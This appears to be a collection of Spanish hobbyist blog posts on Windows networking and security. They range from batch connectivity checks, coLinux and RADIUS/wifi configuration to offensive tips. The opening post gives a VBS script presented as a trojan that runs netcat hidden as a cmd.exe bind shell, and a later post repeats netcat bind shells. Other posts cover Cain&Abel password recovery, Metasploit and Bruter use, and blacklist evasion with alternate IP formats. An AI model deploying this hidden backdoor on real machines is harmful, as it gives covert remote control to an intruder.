Si definimos troyano como aquel Sw oculto, al usuario, que sirve para controlar en remoto un sistema, en windows nos bastaría con netcat lanzado de forma oculta como servidor escuchando en un puerto y redireccionando a cmd.exe

Si el netcat no aparece en la pestaña de aplicaciones del task manager o administrador de tareas, ni se ve ninguna ventana o indicador en el escritorio del usuario, nos daríamos por contentos.

Con un poco de vbs se puede hacer:

oculto.vbs

Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create _
("E:\nc111nt\nc -l -p 1357 -e cmd.exe", null, objConfig, intProcessID)

Solo tiene un inconveniente: Si se vería el proceso nc en la pestaña procesos (no en la de aplicaciones)  del task manager o administrador de tareas … no hay nada perfecto

Creo el fichero desde consola dos (inicio > ejecutar > cmd) beep.txt

c:> copy con beep.txt

^G

^Z

Para comprobar si esta bien realizado escribe en consola: type beep.txt , deberias oir un beep (sonido)

Ahora vamos al script ( .bat o .cmd)

Control de conectividad con script conectividad.bat

Comprobamos conectividad con Host www.google.com con delay entre comprobaciones de 5 sg

@echo off
:inicio
if exist testigo.txt del testigo.txt
set ERRORLEVEL =
ping -n 1 www.google.com > testigo.txt
rem La solicitud de ping no pudo encontrar el host
echo Comprobando conmectividad ...
@find /C "La solicitud de ping no pudo encontrar el host" testigo.txt > null
rem find /C "recibidos = 0" testigo.txt
rem si errorlevel = 0  ha encontrado recibidos=0 lo cual indica que no hay conectivida
if %ERRORLEVEL%==0  goto pita else goto continua
:continua
color 17
echo Si hay conectividad

rem delay de 5sg
@ping -n 5 127.0.0.1 > null
goto inicio

:pita
echo No hay conectividad
rem start pita.mp3
color cf
type beep.txt
goto inicio

Demo: Bajo windows XP SP3 en español

Ejecuto el script conectividad.bat y si hay conectividad, pantalla en azul y letras blancas y si no la hay pantalla en rojo y letras blancas  y sonido (type beep.txt). la conectividad se simula simplemente desconectado o conectando el cable de red o desactivando o no la wifi o el interfaz de red con salida a Inet…

Con conectividad

Desconecto cable de red -> Sin conectividad

Vuelvo a conectar cable de red->  Con conectividad

En windows, desde el panel de control, podemos acceder a “Cuentas de usuario” o “Credential manager“, que por linea de comandos  se accedería con: inicio > ejecutar > control userpasswords2 . o desde consola con

c:\> control userpasswords

Pero existe una gui o interfaz visual de usuario más, que nos puede servir para, entre otros objetivos para:

Almacenar Nombres de usuario y contraseñas para acceder a recursos remotos.

Esta esta utilidad nos sirve sobre todo para acceder a servidores de otro dominio distinto al nuestro sin tener que estar escribiendo un usuario:contraseña del otro dominio constantemente. Esta algo escondida a la vista, y se accede con

control userpasswords2

Vamos a:  Opciones avanzadas > Administrar contraseñas > Agregar

Y definimos el acceso a un host remoto:

Servidor: Nombre del host o ip

usuario: Usuario@dominio

(aqui uso el formato de NT y W2k, se podria usar el formarto más actual: Dominio\usuario)

contraseña: ***********

Si intento acceder al recurso compartido \\80.59.69.240\c , no hay problemas (la primera vez, creo que si te pide la password, luego ya no)

Pero si intento acceder por el nombre del host a otro recurso compartido ( \\placetorun0\Admin$ ), me pide usuario:contraseña, ya que definí el acceso a la ip, no al nombre del host

Ahora voy a trabajar por consola (inicio > ejecutar > cmd ) para ver y acceder o mapear recursos compartidos en un host donde ya almacené las credenciales, para que no me este preguntando constantemente por validaciones del usuario.

Ver recursos compartidos

c:\> net view \\80.59.69.241

Mapear UD de red a recurso compartido, en este caso el recurso administrativo oculto  admin$

c:\> net use z: \\80.59.69.241\admin$

Y creo un fichero de texto en esa UD, (por hacer algo), sin necesidad de editor (lo vamos a crear, el fichero, volcando la entrada de consola)

c:\> copy con z:\prueba.txt

loquesea …

^Z

(con ctrl-Z se marca el EOF del fichero)

Y voila, no me ha pedido credenciales, ya que están almacenadas (en caché o cacheadas, se podría decir, creando un palabro nuevo).

Solo tiene un handicap, desde el punto de vista de la seguridad, si cacheas usuarios:contraseñas de acceso a un servidor, si alguien tiene acceso local a tu máquina, puede desencriptar las contraseñas. Por ejemplo con Cain&Abel

No hay nada perfecto

El País cuenta que Google lanza un nuevo sitio específico para búsquedas en tiempo real: «Google ha lanzado una versión de su navegador, real time, que permite seguir al internauta en tiempo real lo que en las redes sociales se está diciendo sobre el término buscado. También se puede acceder desde Google, pulsando a la izquierda Tiempo Real (si no es visible hay que activar la pestaña Más). El servicio ofrece el flujo de conversaciones en varias redes sociales (Facebook, Twitter…) que se pueden filtrar por fecha, lugar u hora, activando un gráfico que aparece en la parte superior de la página».

Referencia: http://www.google.es/realtime

Mi comentario:

Curiosa herramienta. Práctica  para seguir a usuarios en las redes sociales (de Twitter se nutre bastante, de facebook no veo resultados, ergo google se lleva bien con twitter y no tan bien con facebook o puede que la política de privacidad de facebook no sea tan abierta como dicen …   )

NetCat es una utilidad versátil para trabajar con puertos (sockets). La llaman la navaja Suiza de Tcp/IP.

Sirve, desde copiar o clonar un disco duro en red (esto al menos en Linux), crear un chat, Obtener una shell remota, hacking, …,  hasta para crear un HoneyPot

Como ejemplo, voy a crear un HoneyPot de un servidor de telnet.

Descargo NetCat para windows XP:

* descargar nc111nt.zip (Algunos antivirus puede que clasifiquen esta utilidad como una HackTool o herramienta de hacking, y es realmente eso, una herramienta, no un virus).

* Descomprimo la utilidad. Y creo un fichero de texto llamado telnet.txt tal que:

Connected to blackberet.gc.intranet.local
Escape character is ‘^]’.
login: root
password:

* Y desde una consola o shell (inicio > ejecutar > cmd ) creo un servidor de telnet

c:\nc111nt> nc -l -p 23 < telnet.txt

• -l <–> Opción que indica a netcat que se ponga en modo servidor o a la escucha :listening

• -p 23 <–> Opción que indica a netcat el puerto o socket local por el cual va a escuchar, en este caso el por defecto de un servidor telnet (tcp23)

• < telnet.txt <–> Direcciono o Canalizo el contenido de ese fichero de texto al “servidor de telnet”, es decir, cualquier cliente que se conecte por telnet a mi máquina recibirá el contenido de ese fichero en su consola o cliente de telnet

* Prueba de concepto o demo (redirecciono todo el comando al fichero telnet-log.txt para tener un registro de que es lo que manda el cliente que se conecte al honeypot de servidor de telnet)

c:\nc111nt> nc -l -p 23 < telnet.txt >> telnet-log.txt

Y me conecto por telnet, emulando a un cliente:

c:\> telnet 80.59.69.239

Me aparecerá en la consola el contenido del fichero telnet.txt,

y si intento mandar alguna password, quedará registrada en el fichero telnet-log.txt. Y voilá.

Nota: Servidor Telnet con Netcat

A todo esto, si deseas dotar de un servidor de telnet, real o verdadero (no un fake o trampa o honeypot) a tu máquina con netcat, nada más facil:

* Lado del servidor: Ponemos netcat a la escucha en el puerto 23 y se ejecutará en el cliente remoto cmd.exe de nuestra máquina, con lo que obtiene una shell

• Bajo windows: c:\nc111nt> nc -l -p 23 -e cmd.exe
• Bajo Linux:  # nc -lp 23 -c /bin/sh

* lado del cliente: Simplemente conectarse por telnet al objetivo

c:\ telnet 80.59.69.239

y obtendremos la consola remota

Referencias:

• Linux: Copiar disco en red con NetCat y backdoor o reverse shell)
• Linux: Chat casero con NetCat y otros usos
• Netcat, la navaja suiza de TCP/IP
• http://es.wikipedia.org/wiki/Netcat

Tras instalarlo, probé la configuración de la tarjeta de red con modo slirp, o pcap-bridge, pero no se veía  la máquina anfitrión con la huésped. Así que probé con el modo ndis-bridge.(este modo es operativo a partir de la versión 0.7.4).

The NDIS driver is new in coLinux 0.7.4. It makes use of the NDIS programming API built into windows. It works in practice exactly like the WinPcap driver, just without third party network drivers.

Ver:

• http://colinux.wikia.com/wiki/Network#Bridging
• http://colinux.wikia.com/wiki/Network#NDIS

En el fichero de configuración (.conf,  en mi caso usé el por defecto example.conf), para la tarjeta eth0 (del huesped linux), le indique se pusiera en modo bridge con la tarjeta de red de windows (anfitrión):

eth0=ndis-bridge,”Conexión de área local”

Tras esto, lanzo colinux:

colinux-daemon @example.conf

Y compruebo que efectivamente, en mi XP SP3 con colinux  0.7.7.1, se ve el host anfitrión y el huésped (responde a ping y son alcanzables ambos por otros servicios y protocolos).

Nota para los olvidadizos (como yo): Hay que configurar también las interfaces de red del host huésped

Parece todo trivial, pero me pasé un par de buenas horas hasta dar con el modo o driver ndis … en fin

- Lo bueno de Colinux:

* Consume pocos recursos en comparación a otros Sw de virtualización (virtualBox, VMWare, …)

* Puedes trabajar con particiones de tu pc que ya tengan un linux instalado, o incluso con el fichero que emula la partición de Ubuntu de Wubi.

- Lo malo:

* Trabaja con ext3. Pero No trabaja con particiones ext4   . Esperemos que una nueva versión actualice esta limitación.

Ping.vbs

Host="127.0.0.1"
Set objPing = GetObject("winmgmts:{impersonationLevel=impersonate}")._
    ExecQuery("Select * from Win32_PingStatus Where Address = '" & Host & "'")

   For Each objStatus in objPing
      strResult = "" & "Result: "
      Select Case objStatus.StatusCode
         Case 0 strResult = strResult & "Success"
         Case 11001 strResult = strResult & "Buffer too small"
         Case 11002 strResult = strResult & "Destination net unreachable"
         Case 11003 strResult = strResult & "Destination host unreachable"
         Case 11004 strResult = strResult & "Destination protocol unreachable"
         Case 11005 strResult = strResult & "Destination port unreachable"
         Case 11006 strResult = strResult & "No resources"
         Case 11007 strResult = strResult & "Bad option"
         Case 11008 strResult = strResult & "Hardware error"
         Case 11009 strResult = strResult & "Packet too big"
         Case 11010 strResult = strResult & "Request timed out"
         Case 11011 strResult = strResult & "Bad request"
         Case 11012 strResult = strResult & "Bad route"
         Case 11013 strResult = strResult & "Time-To-Live (TTL) expired transit"
         Case 11014 strResult = strResult & "Time-To-Live (TTL) expired reassembly"
         Case 11015 strResult = strResult & "Parameter problem"
         Case 11016 strResult = strResult & "Source quench"
         Case 11017 strResult = strResult & "Option too big"
         Case 11018 strResult = strResult & "Bad destination"
         Case 11032 strResult = strResult & "Negotiating IPSEC"
         Case 11050 strResult = strResult & "General failure"
         Case Else strResult = strResult & "Unknown host"
      End Select
      strResult = strResult & " Host : " & UCase(Host)
   Next
   msgbox strResult
   Set objPing = Nothing

Metasploit es un framework (marco o entorno de trabajo) para test de penetración ( Metasploit penetration testing framework ). Hay versiones para Linux y windows.

Lo instalo en windows XP SP3:

En el transcurso de la instalación, puedes instalar la última versión de Nmap (no necesita presentaciones este scanner de red) y winpcap (la libreria de captura en modo promiscuo de paquetes de red para windows).

Lanzamos la consola de Metasploit, la primera vez que se lanza, hay que tener paciencia, ya que se dedica a configurar permisos y entorno …

Y por fin tenemos la consola o shell

Probamos un exploit: (Guia en http://www.metasploit.com/documents/users_guide.pdf )

- 1º buscamos lo relacionado con un servicio o protocolo de red expotable, p.e: el VNC:

msf > search vnc

Usamos el modulo auxiliar scanner/vnc/vnc_none_auth

msf > use scanner/vnc/vnc

Que nos muestre las opciones (parámetros)

msf > show options

Parametrizamos, en este caso solo RHOSTS (Remote Hosts) con la IP del objetivo (pongo una ip de ejemplo)

msf > set RMHOSTS 80.59.69.239

Y lanzamos el exploit, en este caso el modulo auxiliar de detección de VNC server sin autenticación

msf > exploit

Y voilá …

Una referencia recomendable: http://www.offensive-security.com/metasploit-unleashed/VCN-Authentication

Bruter (Bruter_1.1_Beta1) es una utilidad bajo windows (o en linux si lo usas con wine), para ejecutar test de fuerza bruta contra diversos protocolos: (telnet, ssh2, ftp, http, SQL Server, SMB, MySQL, VNC, …)

Lo pruebo contra una bbdd, mia, en remoto bajo MS SQL Server 2008 :

Y funciona bien (logicamente sé mi usuario:contraseña, pero compruebo que funciona como test de fuerza bruta). Ahora efectuo un test contra mi máquina local al servidor ssh:

Y, efectivamente, trabaja bien.

nota: Marco “Stop when found one” (Parar cuando encuentre una [ contraseña ] ), para no hacer interminable el test.

o Desktop Access-StandAlone Application:

referencias:

- Runtime Access 2007

- Download the Access 2007 Developer Extensions

Es bastante util y rápido (productivo) implementar aplicaciones de escritorio en windows con Access.

Personalmente uso access en windows,  para implementar los formularios de usuario (el gui o frontend), y que ataquen (consulten, inserten, actualicen, borren, … registros en una bbdd) a una bbdd en red (SQL Server, MySQL o el propio Access si es una bbdd pequeña y para pocos usuarios y con necesidades de seguridad mínimas).

Lo que ocurre es que si cada usuario debe de tener una licencia de access, sale costoso.

Pero hay una solución. El desarrollador tendría access instalado y podría distribuir su aplicación a los usuarios, sin que tengan acces instalado gracias al Runtime distribuible de Access y al Microsoft Office Access Developer extensions. Y a parte de rápido y barato, tienes la seguridad de que ningún manitas manipulará el código de la aplicación/bbdd …

* Procedimiento:

- Una vez diseñada y abierta la aplicación/bbdd en Access, y habiendo instalado previamente el Access Developer extensions, desde el menú principal > Programador > Paquete de soluciones

- 2º Seguimos el asistente para paquetes de soluciones

- Carpeta de destino

- Entre otras opciones (icono, carpetas de instalacion, …) elijo la opción de descargar Runtime de access, si no tiene el cliente access instalado.

- podriamos añadir ficheros adicionales (imágenes, aplicaciones complemetarias, …) y claves de registro

- Nombre, título, licencia, información, imagen del instalador … Una vez finalizado el proceso …

- Nos crea un setup.exe (el instalador) con los ficheros necesarios para la instalación.

- Ejecuto el instalador (puede estar en un recurso compartido de red)

- La instalación crea un acceso directo en el menú y en el escritorio (configurable). Y una vez el usuario ejecute su instalación, si no dispone del runtime de access, se descargaria y se instalaria (solo una vez haria falta este proceso) y se habriria su Desktop Access-StandAlone Application .

Y voilá …

Una IPv4,  es una dirección de 32 bits, que sirve para identificar de forma lógica una interfaz de red de un host o dispositivo, expresada en cuatro octetos: a.b.c.d , donde a,b,c,d son enteros comprendidos entre 0 y 255

Uno de los  DNS (URL <—> IPv4 en decimal) de www.google.es, es:

www.google.es <—>  66.249.92.104

Pero si expresamos esta IP en distintos formatos, ya sea calculandolo a mano o usando un conversor:

• Octal:  000000102.000000371.000000134.000000150

• Hexadecimal:  0x42f95c68

• Entero:  1123638376

• Decimal: 66.249.92.104

Todos los formatos serán interpretados por tu sistema y/o tu navegador como válidos:

Ejemplo, si efectuo un ping a la ip 66.249.92.104, en distintos formatos:

Todos funcionan sin problema. Una de las hipotéticas utilidades que a voz de pronto puede tener el usar la IPv4 en otro formato es evadir una lista negra de DNS de un firewall o proxy. Pero, claro, seria un firewall o proxy muy ingenuo …

Traduzco de la página de referencia:

• Inicio > ejecutar > cmd > NET USERS /DOMAIN >USERS.TXT

This command will return the user accounts from the Primary Domain Controller (PDC) of the current domain, and write them to a file called USER.TXT

Este comando devolverá las cuentas de usuario del Controlador de dominio primario (PDC) de el dominio actual (corriente), y los escribe en un fichero llamado USER.TXT

• NET ACCOUNTS /DOMAIN >ACCOUNTS.TXT

This command will return the account policy information from the PDC of the current domain, and write it to a file called ACCOUNTS.TXT

Este comando devolverá la información de políticas de cuenta desde el PDC del dominio actual, y lo escribe en el fichero llamado ACCOUNTS.TXT

• NET CONFIG SERVER >SERVER.TXT

This command will return the server name, version of Windows, active network adapter information/MAC address, Server hidden status, Maximum Logged On Users, Maximum open files per session, Idle session time, and assign it to a file called SERVER.TXT

Este comando devolverá el nombre del servidor, versión de windows, información, dirección MAC de capa 2,  del adaptador de red activo, estado de ocultación del servidor, Máximo de usuarios que pueden iniciar sesión, máximo de ficheros abiertos por sesión, tiempo de sesión idle, y lo escribe en el fichero llamado SERVER.TXT

• NET CONFIG WORKSTATION >WKST.TXT

This command will return the workstation name, user name, version of Windows, network adapter, network adapter information/MAC address, Logon domain, COM Open Timeout, COM Send Count, COM Send Timout, and write it to a file called WKST.TXT.

este comando devolverá el nombre de la máquina, nombre de usuario, versión de windows, adaptador de red, información del adaptador (Mac address), dominio donde se inicia sesión, tiempo limite de espera de COM open,  contador de COM enviados, …, y lo escribe en el fichero WKST.TXT

• NET GROUP /DOMAIN >DGRP.TXT

This command will return the global groups on the PDC of the current domain, and write them to a file called GRP.TXT.

Este comando devolverá los grupos globales en el PDC del dominio actual, y lo escribirá el el fichero GRP.TXT

• NET LOCALGROUP >LGRP.TXT

This command will return the local groups on the local machine, and write them to a file call LGRP.TXT.

Obrtendremos los grupos locales de la máquina en LGRP.TXT

• NET VIEW /DOMAIN:DOMAINNAME >VIEW.TXT

This command will return the resources in the specified domain, and write them to a file called VIEW.TXT.

Recursos compartidos del dominio en el fichero VIEW.TXT

Se aconseja implementar IAS en un DC ( controlador de dominio ). Pero la condición necesaria bajo windows es
que donde se implemente tenga configurado el AD ( directorio activo ).
nota: Por defecto, IAS almacena los logs en ficheros en el path = %systemroot%\LogFiles\IAS\* . Se puede
configurar para que los almacene en bbdd como SQL server
nota: Hay una alternativa free y open source a IAS/Radius de microsoft : http://www.freeradius.org/ que se suele
implementar bajo Debian
* Agregar o quitar componentes de windows > Certificates Services
Nota: el servidor web IIS (internet information server )tiene que estar activado y por ende el interprete de scripts de
el lado de el servidor ASP ( active server page)

* Tipo de CA  (Autoridad Certificadora): Enterprise root CA (puesto que tenemos un dominio y ningun otro CA)

Continuar:

* Tipo de encriptación para el par privado y público de llaves

* identificación del CA

* Opciones de la bbdd ( base de datos) de certificados

* ASP (Active Server Pages en IIS) debe de estar activo

* Agregar componentes de windows > Servicios de red > Internet Authentication Service

* Bajar el certificado: http://localhost_o_nombre_servidor/certsrv

* Solicitar un certificado e instalarlo

* Herramientas administrativas > IAS : Configurar los clientes Radius ( en este caso serán los APs )

* Añadimos los clientes radius

* Políticas de acceso remoto

* Definir método de acceso ( Al ser APs conectados a un switch seria via  Ethernet  )

* usuario o grupo de acceso

* Método de autenticación

* Método de configuración de políticas

* Seleccionar tipo de atributo a añadir

* Politica de condiciones de las conexiones

* Denegar o permitir el acceso remoto a los usuarios que tengan las condiciones especificadas

* Editar perfiles

* editar dial-in perfil

* tipo de EAP

* Solo queda :Configuración del certificado en los clientes ( estaciones bajo Windows XP Pro, ojo el Home Edition no vale )

xxx

Implementación de una red wireless segura

Condiciones: solo se citan las condiciones relevantes que afectan a la configuración e implementación técnica
Condiciones de la Arquitectura:
WIFI-ARCH-002: Direccionamiento de capa 3 cumplirá el RFC 1918 ( IPs privadas )
WIFI-ARCH-003: Red wifi segmentada (router) y filtrada (firewall) de la red de cable ethernet. La solución
más obvia es un firewall Watchguard ( ¿ usar el firewall del cpd del cliente o uno distinto ?)

Posible Topologia física

WIFI-ARCH-004: Los equipos de segmentación y filtrado de la red wifi deben cumplir el standard TSP
Internet
nota: TSP Internet = http://www.ietf.org/rfc/rfc3161.txt
(Internet X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) )o a tuneles para IPv6

Condiciones de la Configuración:
WIFI-CONF-001: Acceso a la re wifi protegido mediante identificación y autenticación
WIFI-CONF-002: La identificación de la red wifi ( SSID) deberá cumplir con:
- SSID distinta de la identificación por defecto de los equipos
- SSID de dificil descubrimiento que no hagan referencia al nombre del cliente ( ocultación SSID )
- Se recomienda cambiar la SSID cada año

WIFI-CONF-003: Modo abierto ( open mode) deshabilitado.
WIFI-CONF-004: Deshabilitado el broadcast del SSID por los APs
WIFI-CONF-005: Usar 802.11i standard ( también conocido como WPA2) y WPA basado en TKIP y AES.
(Advanced encription standar )
WIFI-CONF-006: la longitud de las llaves de encriptación AES >= 128 bits
WIFI-CONF-007: Si número de direcciones clientes de la red wifi < 15 entonces aplicar filtrado de MAC
WIFI-CONF-008: Encriptación de los ficheros del HD de toda estación que sea cliente de la red wifi
WIFI-CONF-009: Modo Ad-hoc deshabilitado
WIFI-CONF-010: Intercambio de datos entre APs, solo mediante la red de cable
WIFI-CONF-011: El acceso via wifi requiere autenticación dinámica mediane un ID enlazado a Radius
WIFI-CONF-012: Los APs no deben enviar información técnica a los clientes
WIFI-CONF-013: Todo acceso o su intento a la red wifi debe de ser registrado en ficheros ( logs)
WIFI-CONF-014:Los ficheros logs deben almacenarse en un servidor dedicado ( ¿ servidor de radius puede
ser el mismo que el de almacenamiento de logs ?)
WIFI-CONF-015: los ficheros log permanecerán almacenados durante 1 año y despues del año borrados

Condiciones de la Administración:
WIFI-ADM-004: La gestión de los APs solo se hará desde la red de cable
WIFI-ADM-005: La gestión de los APs se efectuará solo mediante protocolos seguros ( https, ssh )
WIFI-ADM-006: Se deshabilitarán protocolos no seguros ( http, ftp, telnet,…)

@echo off
rem buscamac.cmd
echo Segmento 192.168.0.0/24 ( 192.168.0.1-192.168.0.254 )
echo Introduce mac a buscar ( ejemplo:  00-11-21-a2-8c-80 )
set /P lamac=
echo Nº de ecos del ping ( minimo:1, maximo:4)
set /P necos=
echo Escaneando red ... espere por favor
for /L %%k in (1,1,254) do (
 echo Escaneando IP: 192.168.0.%%k ...
 @echo 192.168.0.%%k >> tabla_ip_mac.txt
 getmac /S 192.168.0.%%k >> tabla_ip_mac.txt
)
echo.
echo Fin escaneo por icmp
@find "%lamac%" tabla_ip_mac.txt
pause
rem by javier castañón 2007

O usando arp

@echo off
rem buscamac.cmd
echo Segmento 192.168.0.0/24 ( 192.168.0.1-192.168.0.254 )
echo Introduce mac a buscar ( ejemplo:  00-11-21-a2-8c-80 )
set /P lamac=
echo Nº de ecos del ping ( minimo:1, maximo:4)
set /P necos=
echo Escaneando red mediante icmp ... espere por favor
for /L %%k in (1,1,254) do (
 echo Escaneando IP: 192.168.0.%%k ...
 echo.
 ping -n %necos% 192.168.0.%%k >> elping.txt
 arp -a 192.168.0.%%k >> tabla_ip_mac.txt
)
echo.
echo Fin escaneo por icmp
@find "%lamac%" tabla_ip_mac.txt
pause
rem by javier castañón 2007